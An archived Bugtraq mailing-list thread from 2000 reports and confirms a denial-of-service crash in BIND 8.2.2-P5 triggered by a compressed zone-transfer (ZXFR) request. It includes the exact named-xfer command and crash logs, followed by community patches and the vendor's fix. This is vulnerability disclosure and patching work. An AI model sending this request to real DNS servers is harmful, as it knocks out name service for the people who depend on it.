5699488 2000-11-07 13:40 +0100 /45 rader/ Fabio Pietrosanti (naif) <fabio@TELEMAIL.IT> Sänt av: joel@lysator.liu.se Importerad: 2000-11-08 18:47 av Brevbäraren (som är implementerad i) Python Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM Externa svar till: naif@inet.it Mottagare: Bugtraq (import) <13646> Ärende: BIND 8.2.2-P5 Possible DOS ------------------------------------------------------------ From: "Fabio Pietrosanti (naif)" <fabio@TELEMAIL.IT> To: BUGTRAQ@SECURITYFOCUS.COM Message-ID: <Pine.LNX.4.30.0011071339510.29294-100000@naif.inet.it> Hi, playing with bind and ZXFR feature ( zone transfer compressed with a possible insecure execlp("gzip", "gzip", NULL); ), i discovered a Denial Of Service against Bind 8.2.2-P5 . By default Bind 8.2.2-P5 it's not compiled with ZXFR support unless you define it with #define BIND_ZXFR so it will refuse any ZXFR transfer, because it doesn't support it. But now what appens? Look here... ################################ zone to transfer: zone.pippo.com dns server: dns.pippo.com 192.168.1.1 me: naif.gatesux.com 10.10.10.10 I send a Zone Trasnfer request using "-Z" switch with means that i wish to use ZXFR. dns.pippo.com does'nt support ZXFR and have "allow-transfer{}" not configured, so everyone could ask him for *.zone.pippo.com ... <naif@naif> [~/bind/src822p5/bin/named-xfer] $ ./named-xfer -z zone.pippo.com -d 9 -f pics -Z dns.pippo.com named-xfer[29297]: send AXFR query 0 to 192.168.1.1 named-xfer[29297]: premature EOF, fetching "zone.pippo.com" On the server's log: Nov 7 11:19:09 dns.pippo.com: named[188510]: approved ZXFR from [10.10.10.10].2284 for "zone.pippo.com" Nov 7 11:19:09 dns.pippo.com: named[188510]: unsupported XFR (type ZXFR) of "zone.pippo.com" (IN) to [10.10.10.10].2284 Then the server "*** CRASHED ***" . I should assume that bind 8.2.2-P5 it's vulnerable ( Please someone test and confirm this kind of dos) and bind-9.0.0 has no support for ZXFR . <naif@naif> [~/bind] $ find src822p5/ -type f -exec grep -i zxfr \{\} ';' | wc -l 234 <naif@naif> [~/bind] $ find bind-9.0.0/ -type f -exec grep -i zxfr \{\} ';' | wc -l 0 A lot of DNS Server are misconfigured, and allow zone-transfer to any, so they are dossable... naif naif@itapac.net (5699488) --------------------------------(Ombruten) Kommentar i text 5701181 av Martin McFlySr <Martin@MCFLYSR.KURGAN.RU> Kommentar i text 5701197 av Greg A. Woods <woods@WEIRD.COM> Kommentar i text 5701313 av Jeroen Ruigrok/Asmodai <asmodai@FREEBSD.ORG> Kommentar i text 5701327 av Akatosh <akatosh@RAINS.NET> Kommentar i text 5701647 av Walter Hop <walter@SKYDANCER.NL> Kommentar i text 5701763 av Daniel Roesen <droesen@ENTIRE-SYSTEMS.COM> Kommentar i text 5701785 av Darron Froese <darron@FROESE.ORG> 5701181 2000-11-09 01:00 +0300 /31 rader/ Martin McFlySr <Martin@MCFLYSR.KURGAN.RU> Sänt av: joel@lysator.liu.se Importerad: 2000-11-09 07:37 av Brevbäraren (som är implementerad i) Python Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM Externa svar till: Martin@McFlySr.Kurgan.Ru Mottagare: Bugtraq (import) <13658> Kommentar till text 5699488 av Fabio Pietrosanti (naif) <fabio@TELEMAIL.IT> Ärende: Re: BIND 8.2.2-P5 Possible DOS ------------------------------------------------------------ From: Martin McFlySr <Martin@MCFLYSR.KURGAN.RU> To: BUGTRAQ@SECURITYFOCUS.COM Message-ID: <5229790120.20001109010001@McFlySr.Kurgan.Ru> Hello Fabio Pietrosanti (naif), Tuesday, November 07, 2000, 15:40:49, you wrote: FPn> Then the server "*** CRASHED ***" . FPn> I should assume that bind 8.2.2-P5 it's vulnerable ( Please someone FPn> test and confirm this kind of dos) ... FPn> A lot of DNS Server are misconfigured, and allow zone-transfer to any, FPn> so they are dossable... Yes, 8.2.2 is vulnerable. With "allow-transfer" or without it. If 8.2.2 havent a "allow-tranfer", request from any host can crash bind. If 8.2.2 have a "allow-tranfer", request from any host (from "allow-tranfer" list can crash bind. -- Thursday, November 09, 2000, 00:49 Best regards from future, Martin McFlySr, HillDale. (5701181) --------------------------------(Ombruten) 5701197 2000-11-08 14:38 -0500 /27 rader/ Greg A. Woods <woods@WEIRD.COM> Sänt av: joel@lysator.liu.se Importerad: 2000-11-09 07:52 av Brevbäraren (som är implementerad i) Python Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM Externa svar till: woods@weird.com Mottagare: Bugtraq (import) <13660> Kommentar till text 5699488 av Fabio Pietrosanti (naif) <fabio@TELEMAIL.IT> Ärende: Re: BIND 8.2.2-P5 Possible DOS ------------------------------------------------------------ From: "Greg A. Woods" <woods@WEIRD.COM> To: BUGTRAQ@SECURITYFOCUS.COM Message-ID: <20001108193827.403514@proven.weird.com> [ On Tuesday, November 7, 2000 at 13:40:49 (+0100), Fabio Pietrosanti (naif) wrote: ] > Subject: BIND 8.2.2-P5 Possible DOS > > Then the server "*** CRASHED ***" . > > I should assume that bind 8.2.2-P5 it's vulnerable ( Please someone > test and confirm this kind of dos) I can always crash any of my remaining 8.2.2-P3 instances this way but only some of the 8.2.2-P5 instances I've tried so far will crash on demand.... (The busiest ones....) :-( I'll be searching the bug out with gdb before you read this.... :-) -- Greg A. Woods +1 416 218-0098 VE3TCP <gwoods@acm.org> <robohack!woods> Planix, Inc. <woods@planix.com>; Secrets of the Weird <woods@weird.com> (5701197) ------------------------------------------ 5701313 2000-11-08 21:59 +0100 /40 rader/ Jeroen Ruigrok/Asmodai <asmodai@FREEBSD.ORG> Sänt av: joel@lysator.liu.se Importerad: 2000-11-09 08:30 av Brevbäraren (som är implementerad i) Python Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM Externa svar till: asmodai@FREEBSD.ORG Mottagare: Bugtraq (import) <13661> Kommentar till text 5699488 av Fabio Pietrosanti (naif) <fabio@TELEMAIL.IT> Ärende: Re: BIND 8.2.2-P5 Possible DOS ------------------------------------------------------------ From: Jeroen Ruigrok/Asmodai <asmodai@FREEBSD.ORG> To: BUGTRAQ@SECURITYFOCUS.COM Message-ID: <20001108215951.A53141@daemon.ninth-circle.org> -On [20001108 19:01], Fabio Pietrosanti (naif) (fabio@TELEMAIL.IT) wrote: >playing with bind and ZXFR feature ( zone transfer compressed with a >possible insecure execlp("gzip", "gzip", NULL); ), i discovered a >Denial Of Service against Bind 8.2.2-P5 . Data points: FreeBSD 4-STABLE and 5-CURRENT with BIND 8.2.3-T5B and T6B plus aa_patch and the described `DoS/exploit' will not work. The logs show that it got a zonetransfer type which was unsupported, but the named just keeps on ticking. Solaris with BIND 8.2.2-p5 has no problems as well. And I am betting money on it that BIND 8.2.2-p5 will not fail under FreeBSD as well. Personally I think it will not cause problems on a lot of systems, aside from spurious log entries. However, there is always a chance of DoS'ing a nameserver with zonetransfers. But that falls outside the reported scope of the mentioned special DoS/exploit using ZXFR's in conjunction with BIND. -- Jeroen Ruigrok vd Werven/Asmodai asmodai@[wxs.nl|bart.nl|freebsd.org] Documentation nutter/C-rated Coder BSD: Technical excellence at its best The BSD Programmer's Documentation Project <http://home.wxs.nl/~asmodai> The fragrance always stays in the hand that gives the rose... -- Please respect the privacy of this mailing list. To UNSUBSCRIBE, email to debian-private-request@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmaster@lists.debian.org (5701313) --------------------------------(Ombruten) 5701327 2000-11-08 17:29 -0500 /22 rader/ Akatosh <akatosh@RAINS.NET> Sänt av: joel@lysator.liu.se Importerad: 2000-11-09 08:34 av Brevbäraren (som är implementerad i) Python Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM Externa svar till: akatosh@RAINS.NET Mottagare: Bugtraq (import) <13663> Kommentar till text 5699488 av Fabio Pietrosanti (naif) <fabio@TELEMAIL.IT> Ärende: Re: BIND 8.2.2-P5 Possible DOS ------------------------------------------------------------ > > I should assume that bind 8.2.2-P5 it's vulnerable ( Please someone test and confirm this kind of dos) > and bind-9.0.0 has no support for ZXFR . > > <naif@naif> [~/bind] $ find src822p5/ -type f -exec grep -i zxfr \{\} ';' | wc -l > HMM yep my bind crashed attatched is my half-assed patch ----------- Akatosh akatosh@rains.net DC2.DfGmL--WT--SksCre+\Cvi+BflN^MH++$-Fj~R+Ac+++!J+S+U-I--#V++[sumobj]Q+Tc++ GCSd-s:-a---C++++UL++++P---L++++E-W++N+o?K-w---O-M--V-PS+PE?YPGPt+5++XR*!tvb++(+++)DI++D++Geh+r--z- (5701327) ------------------------------------------ Bilaga (text/plain) i text 5701328 5701328 2000-11-08 17:29 -0500 /27 rader/ Akatosh <akatosh@RAINS.NET> Bilagans filnamn: "ns_xfr.c.patch" Importerad: 2000-11-09 08:34 av Brevbäraren (som är implementerad i) Python Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM Externa svar till: akatosh@RAINS.NET Mottagare: Bugtraq (import) <13664> Bilaga (text/plain) till text 5701327 Ärende: Bilaga (ns_xfr.c.patch) till: Re: BIND 8.2.2-P5 Possible DOS ------------------------------------------------------------ --- src/bin/named/ns_xfr.c Wed Oct 13 12:39:13 1999 +++ src.new/bin/named/ns_xfr.c Wed Nov 8 16:53:38 2000 @@ -97,7 +97,8 @@ "unsupported XFR (type %s) of \"%s\" (%s) to %s", p_type(type), zones[zone].z_origin, p_class(class), sin_ntoa(qsp->s_from)); - goto abort; + (void) shutdown(qsp->s_rfd, 2); + goto abort2; } #ifdef SO_SNDBUF @@ -195,11 +196,13 @@ type = ns_t_axfr; } if (sx_pushlev(qsp, znp) < 0) { + abort: (void) shutdown(qsp->s_rfd, 2); sq_remove(qsp); return; } + abort2: if (type != ns_t_ixfr) (void) sq_writeh(qsp, sx_sendsoa); else (5701328) ------------------------------------------ 5701647 2000-11-08 21:05 +0100 /33 rader/ Walter Hop <walter@SKYDANCER.NL> Sänt av: joel@lysator.liu.se Importerad: 2000-11-09 09:31 av Brevbäraren (som är implementerad i) Python Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM Externa svar till: walter@SKYDANCER.NL Mottagare: Bugtraq (import) <13668> Kommentar till text 5699488 av Fabio Pietrosanti (naif) <fabio@TELEMAIL.IT> Ärende: Re: BIND 8.2.2-P5 Possible DOS ------------------------------------------------------------ From: Walter Hop <walter@SKYDANCER.NL> To: BUGTRAQ@SECURITYFOCUS.COM Message-ID: <153031338.20001108210527@skydancer.nl> [in reply to fabio@TELEMAIL.IT, 07-11-2000] > <naif@naif> [~/bind/src822p5/bin/named-xfer] $ ./named-xfer -z zone.pippo.com -d 9 -f pics -Z dns.pippo.com > named-xfer[29297]: send AXFR query 0 to 192.168.1.1 > named-xfer[29297]: premature EOF, fetching "zone.pippo.com" > > Then the server "*** CRASHED ***" . > I should assume that bind 8.2.2-P5 it's vulnerable ( Please someone test > and confirm this kind of dos) Yes; I got BIND-8.2.2-P5 on a RH5.2/Linux 2.0.38 box to die using the above command. These were the last log messages: Nov 8 20:36:06 cascade named[396]: unsupported XFR (type ZXFR) of "xxx.nl" (IN) to [xxx.xxx.xxx.xxx].4174 Nov 8 20:36:55 cascade named[396]: db_freedata: DB_F_FREE set Nov 8 20:36:55 cascade named[396]: db_freedata: DB_F_FREE set I haven't been able to reproduce this on: BIND-8.2.2-P5 on RH6.1, Linux 2.2.12-20smp BIND-8.2.2-P5-NOESW on FreeBSD 3.4-RELEASE BIND-8.2.3-T5B on FreeBSD 4.1-RELEASE -- Walter Hop <walter@skydancer.nl> | +31 6 24290808 | PGP: 0xD4DD8DEB Mail agreement-request@skydancer.nl to retrieve the email agreement. (5701647) --------------------------------(Ombruten) Kommentar i text 5701358 av Walter Hop <walter@SKYDANCER.NL> 5701358 2000-11-08 21:25 +0100 /31 rader/ Walter Hop <walter@SKYDANCER.NL> Sänt av: joel@lysator.liu.se Importerad: 2000-11-09 08:40 av Brevbäraren (som är implementerad i) Python Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM Externa svar till: walter@SKYDANCER.NL Mottagare: Bugtraq (import) <13666> Kommentar till text 5701647 av Walter Hop <walter@SKYDANCER.NL> Sänt: 2000-11-09 09:31 Ärende: Re: BIND 8.2.2-P5 Possible DOS ------------------------------------------------------------ From: Walter Hop <walter@SKYDANCER.NL> To: BUGTRAQ@SECURITYFOCUS.COM Message-ID: <1254214870.20001108212511@skydancer.nl> [in reply to walter@skydancer.nl, 08-11-2000] >> <naif@naif> [~/bind/src822p5/bin/named-xfer] $ ./named-xfer -z zone.pippo.com -d 9 -f pics -Z dns.pippo.com > Yes; I got BIND-8.2.2-P5 on a RH5.2/Linux 2.0.38 box to die using the above > command. These were the last log messages: > > Nov 8 20:36:06 cascade named[396]: unsupported XFR (type ZXFR) of > "xxx.nl" (IN) to [xxx.xxx.xxx.xxx].4174 > Nov 8 20:36:55 cascade named[396]: db_freedata: DB_F_FREE set > Nov 8 20:36:55 cascade named[396]: db_freedata: DB_F_FREE set Now "BIND-8.2.2-P5-NOESW" on FreeBSD 3.4-RELEASE crashed too, with the following log messages: Nov 8 21:05:09 unity named[147]: db_freedata: d_rcnt != 0 Nov 8 21:05:09 unity /kernel: pid 147 (named), uid 53: exited on signal 6 Nov 8 21:05:09 unity named[147]: db_freedata: d_rcnt != 0 Strangely, this happens a few minutes _AFTER_ the evil named-xfer! In the timespan between the DoS command and the crash, named functions as normal... -- Walter Hop <walter@skydancer.nl> | +31 6 24290808 | PGP: 0xD4DD8DEB Mail agreement-request@skydancer.nl to retrieve the email agreement. (5701358) --------------------------------(Ombruten) 5701763 2000-11-09 01:12 +0100 /21 rader/ Daniel Roesen <droesen@ENTIRE-SYSTEMS.COM> Sänt av: joel@lysator.liu.se Importerad: 2000-11-09 10:03 av Brevbäraren (som är implementerad i) Python Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM Externa svar till: droesen@ENTIRE-SYSTEMS.COM Mottagare: Bugtraq (import) <13670> Kommentar till text 5699488 av Fabio Pietrosanti (naif) <fabio@TELEMAIL.IT> Ärende: Re: BIND 8.2.2-P5 Possible DOS ------------------------------------------------------------ On Tue, Nov 07, 2000 at 01:40:49PM +0100, Fabio Pietrosanti (naif) wrote: > I should assume that bind 8.2.2-P5 it's vulnerable ( Please someone > test and confirm this kind of dos) Confirmed. I played around a bit and have following reproducable test: http://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=20546 Best regards, Daniel -- ---------------------------------------------------------------------- entire systems GmbH | droesen@entire-systems.com Internet Services | Phone: +49 2624 9550-55 Ferbachstrasse 12 | Fax: +49 2624 9550-20 D-56203 Hoehr-Grenzhausen | http://www.entire-systems.com/ ---------------------------------------------------------------------- (5701763) ------------------------------------------ Bilaga (application/pgp-signature) i text 5701764 5701764 2000-11-09 01:12 +0100 /10 rader/ Daniel Roesen <droesen@ENTIRE-SYSTEMS.COM> Importerad: 2000-11-09 10:03 av Brevbäraren (som är implementerad i) Python Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM Externa svar till: droesen@ENTIRE-SYSTEMS.COM Mottagare: Bugtraq (import) <13671> Bilaga (text/plain) till text 5701763 Ärende: Bilaga till: Re: BIND 8.2.2-P5 Possible DOS ------------------------------------------------------------ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE6CewG92z7ZHglglwRAiqjAKCzPe5OAG3w7B5uvfM7lLcJv/xPDACg6/OT ObIWJKX744BZP1tdVq7CBgk= =V9MZ -----END PGP SIGNATURE----- (5701764) ------------------------------------------ 5701785 2000-11-08 11:43 -0700 /70 rader/ Darron Froese <darron@FROESE.ORG> Sänt av: joel@lysator.liu.se Importerad: 2000-11-09 10:13 av Brevbäraren (som är implementerad i) Python Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM Externa svar till: darron@FROESE.ORG Mottagare: Bugtraq (import) <13672> Kommentar till text 5699488 av Fabio Pietrosanti (naif) <fabio@TELEMAIL.IT> Ärende: Re: BIND 8.2.2-P5 Possible DOS ------------------------------------------------------------ From: Darron Froese <darron@FROESE.ORG> To: BUGTRAQ@SECURITYFOCUS.COM Message-ID: <B62EECD7.4417%darron@froese.org> On 11/7/00 5:40 AM, "Fabio Pietrosanti (naif)" <fabio@TELEMAIL.IT> wrote: > <naif@naif> [~/bind/src822p5/bin/named-xfer] $ ./named-xfer -z zone.pippo.com > -d 9 -f pics -Z dns.pippo.com > named-xfer[29297]: send AXFR query 0 to 192.168.1.1 > named-xfer[29297]: premature EOF, fetching "zone.pippo.com" > > On the server's log: > Nov 7 11:19:09 dns.pippo.com: named[188510]: approved ZXFR from > [10.10.10.10].2284 for "zone.pippo.com" > Nov 7 11:19:09 dns.pippo.com: named[188510]: unsupported XFR (type ZXFR) of > "zone.pippo.com" (IN) to [10.10.10.10].2284 > > Then the server "*** CRASHED ***" . > > I should assume that bind 8.2.2-P5 it's vulnerable ( Please someone test and > confirm this kind of dos) I can confirm this on one of my Mandrake 7.1 boxes (8.2.2-P5 running chrooted and as uid/gid named) - this is what happened: [root@gateway darron]# named-xfer -z domain.com -d 9 -f zone -Z ns1.domain.com named-xfer[20193]: send ZXFR query 0 to 192.168.1.100 named-xfer[20193]: premature EOF, fetching "domain.com" 08-Nov-2000 11:23:54.243 security: info: approved ZXFR from [192.168.1.1].3577 for "domain.com" 08-Nov-2000 11:23:54.244 xfer-out: warning: unsupported XFR (type ZXFR) of "domain.com" (IN) to [192.168.1.1].3577 A couple minutes later in the logs: 08-Nov-2000 11:26:52.040 default: critical: db_freedata: DB_F_FREE set Then named was gone. Dead and gone. I tried it again and attempted 3 zone transfers from an ip that had access to transfer zones from that dns server - it died almost immediately and this was in the logs: 08-Nov-2000 11:30:02.279 default: critical: db_freedata: d_rcnt != 0 It doesn't seem to be consistent in the amount of times it takes to kill it - but it does end up dead. NOTE and WORKAROUND: If you have secured your named daemon from zone transfers from unauthorized locations, it appears that requesting a zone transfer in this manner (which fails because of the security restrictions) doesn't have the same DoS potential. I couldn't get the server to crash if an acl restricted the zone transfer. It seems to work and crash the server if: 1. You have zone transfers open to the entire universe. (The logic of which is debatable and almost certainly stupid.) 2. A zone transfer is being requested from a location that's already allowed to do zone transfers. Authorized zone transfers can crash the server at will. -- Darron darron@froese.org (5701785) --------------------------------(Ombruten) 5705022 2000-11-09 09:40 -0600 /38 rader/ L. Adrian Griffis <dt26453@DSTSYSTEMS.COM> Sänt av: joel@lysator.liu.se Importerad: 2000-11-09 22:07 av Brevbäraren (som är implementerad i) Python Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM Externa svar till: agriffis@dstsystems.com Mottagare: Bugtraq (import) <13678> Kommentar till text 5701313 av Jeroen Ruigrok/Asmodai <asmodai@FREEBSD.ORG> Ärende: Re: BIND 8.2.2-P5 Possible DOS ------------------------------------------------------------ From: "L. Adrian Griffis" <dt26453@DSTSYSTEMS.COM> To: BUGTRAQ@SECURITYFOCUS.COM Message-ID: <Pine.LNX.4.21.0011090932530.1322-100000@dt26453.dstsystems.com> On Wed, 8 Nov 2000, Jeroen Ruigrok/Asmodai wrote: > -On [20001108 19:01], Fabio Pietrosanti (naif) (fabio@TELEMAIL.IT) wrote: > >playing with bind and ZXFR feature ( zone transfer compressed with a > >possible insecure execlp("gzip", "gzip", NULL); ), i discovered a > >Denial Of Service against Bind 8.2.2-P5 . > > Data points: > > FreeBSD 4-STABLE and 5-CURRENT with BIND 8.2.3-T5B and T6B plus aa_patch > and the described `DoS/exploit' will not work. The logs show that it > got a zonetransfer type which was unsupported, but the named just keeps > on ticking. > > Solaris with BIND 8.2.2-p5 has no problems as well. And I am betting > money on it that BIND 8.2.2-p5 will not fail under FreeBSD as well. > > Personally I think it will not cause problems on a lot of systems, aside > from spurious log entries. I urge you not to read too much into these data (specifically the systems that did not crash). Another message mentions that sometimes the daemon operates normally for a while before it crashes. This is very normal for failures to check the validity of returned pointers and programming errors that leads to overruns of allocated memory. It may be that on the systems that didn't crash, some damage has still been done, but the layout of memory is such that it is less likely in this case to terminate the program. More importantly, this leaves open the possibility that an exploitable bug exists, even on those platforms for which bind didn't crash. Adrian (5705022) --------------------------------(Ombruten) 5711114 2000-11-09 16:23 -0500 /45 rader/ Greg A. Woods <woods@WEIRD.COM> Sänt av: joel@lysator.liu.se Importerad: 2000-11-10 21:23 av Brevbäraren (som är implementerad i) Python Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM Externa svar till: woods@weird.com Mottagare: Bugtraq (import) <13689> Kommentar till text 5701327 av Akatosh <akatosh@RAINS.NET> Ärende: Re: BIND 8.2.2-P5 Possible DOS ------------------------------------------------------------ From: "Greg A. Woods" <woods@WEIRD.COM> To: BUGTRAQ@SECURITYFOCUS.COM Message-ID: <20001109212308.AF9214@proven.weird.com> [ On Wednesday, November 8, 2000 at 17:29:15 (-0500), Akatosh wrote: ] > Subject: Re: BIND 8.2.2-P5 Possible DOS > > attatched is my half-assed patch I think this is all that's really necessary. It's working so far for me anyway.... Index: src/bin/named/ns_xfr.c =================================================================== RCS file: /cvs/misc/bind8/src/bin/named/ns_xfr.c,v retrieving revision 1.1.1.3 diff -c -r1.1.1.3 ns_xfr.c *** src/bin/named/ns_xfr.c 1999/11/11 06:06:09 1.1.1.3 --- src/bin/named/ns_xfr.c 2000/11/09 20:49:45 *************** *** 97,103 **** "unsupported XFR (type %s) of \"%s\" (%s) to %s", p_type(type), zones[zone].z_origin, p_class(class), sin_ntoa(qsp->s_from)); ! goto abort; } #ifdef SO_SNDBUF --- 97,104 ---- "unsupported XFR (type %s) of \"%s\" (%s) to %s", p_type(type), zones[zone].z_origin, p_class(class), sin_ntoa(qsp->s_from)); ! (void) shutdown(qsp->s_rfd, 2); ! return; } #ifdef SO_SNDBUF -- Greg A. Woods +1 416 218-0098 VE3TCP <gwoods@acm.org> <robohack!woods> Planix, Inc. <woods@planix.com>; Secrets of the Weird <woods@weird.com> (5711114) --------------------------------(Ombruten) 5711475 2000-11-10 13:50 -0500 /15 rader/ Greg A. Woods <woods@WEIRD.COM> Sänt av: joel@lysator.liu.se Importerad: 2000-11-10 23:28 av Brevbäraren (som är implementerad i) Python Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM Externa svar till: woods@weird.com Mottagare: Bugtraq (import) <13695> Kommentar till text 5701327 av Akatosh <akatosh@RAINS.NET> Ärende: Re: BIND 8.2.2-P5 Possible DOS ------------------------------------------------------------ From: "Greg A. Woods" <woods@WEIRD.COM> To: BUGTRAQ@SECURITYFOCUS.COM Message-ID: <20001110185010.969AC4@proven.weird.com> In case you didn't know yet (I still don't know officially, except that I went looking on the FTP server), but BIND-8.2.2-P7 has been made available and it does fix the bug, albiet in a totally different way! -- Greg A. Woods +1 416 218-0098 VE3TCP <gwoods@acm.org> <robohack!woods> Planix, Inc. <woods@planix.com>; Secrets of the Weird <woods@weird.com> (5711475) --------------------------------(Ombruten) 5716631 2000-11-11 09:33 +1100 /57 rader/ <Mark.Andrews@NOMINUM.COM> Sänt av: joel@lysator.liu.se Importerad: 2000-11-12 21:26 av Brevbäraren (som är implementerad i) Python Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM Externa svar till: Mark.Andrews@NOMINUM.COM Mottagare: Bugtraq (import) <13706> Kommentar till text 5711114 av Greg A. Woods <woods@WEIRD.COM> Ärende: Re: BIND 8.2.2-P5 Possible DOS ------------------------------------------------------------ From: Mark.Andrews@NOMINUM.COM To: BUGTRAQ@SECURITYFOCUS.COM Message-ID: <200011102233.eAAMXSq45378@drugs.dv.isc.org> BIND 8.2.2-P7 is now released and addresses this issue. http://www.isc.org/products/BIND/bind-security.html has also been updated to reflect this. Mark > [ On Wednesday, November 8, 2000 at 17:29:15 (-0500), Akatosh wrote: ] > > Subject: Re: BIND 8.2.2-P5 Possible DOS > > > > attatched is my half-assed patch > > I think this is all that's really necessary. It's working so far for me > anyway.... > > Index: src/bin/named/ns_xfr.c > =================================================================== > RCS file: /cvs/misc/bind8/src/bin/named/ns_xfr.c,v > retrieving revision 1.1.1.3 > diff -c -r1.1.1.3 ns_xfr.c > *** src/bin/named/ns_xfr.c 1999/11/11 06:06:09 1.1.1.3 > --- src/bin/named/ns_xfr.c 2000/11/09 20:49:45 > *************** > *** 97,103 **** > "unsupported XFR (type %s) of \"%s\" (%s) to %s", > p_type(type), zones[zone].z_origin, p_class(class), > sin_ntoa(qsp->s_from)); > ! goto abort; > } > > #ifdef SO_SNDBUF > --- 97,104 ---- > "unsupported XFR (type %s) of \"%s\" (%s) to %s", > p_type(type), zones[zone].z_origin, p_class(class), > sin_ntoa(qsp->s_from)); > ! (void) shutdown(qsp->s_rfd, 2); > ! return; > } > > #ifdef SO_SNDBUF > > -- > Greg A. Woods > > +1 416 218-0098 VE3TCP <gwoods@acm.org> <robohack!woods> > Planix, Inc. <woods@planix.com>; Secrets of the Weird <woods@weird.com> -- Mark Andrews, Nominum Inc. 1 Seymour St., Dundas Valley, NSW 2117, Australia PHONE: +61 2 9871 4742 INTERNET: Mark.Andrews@nominum.com (5716631) ------------------------------------------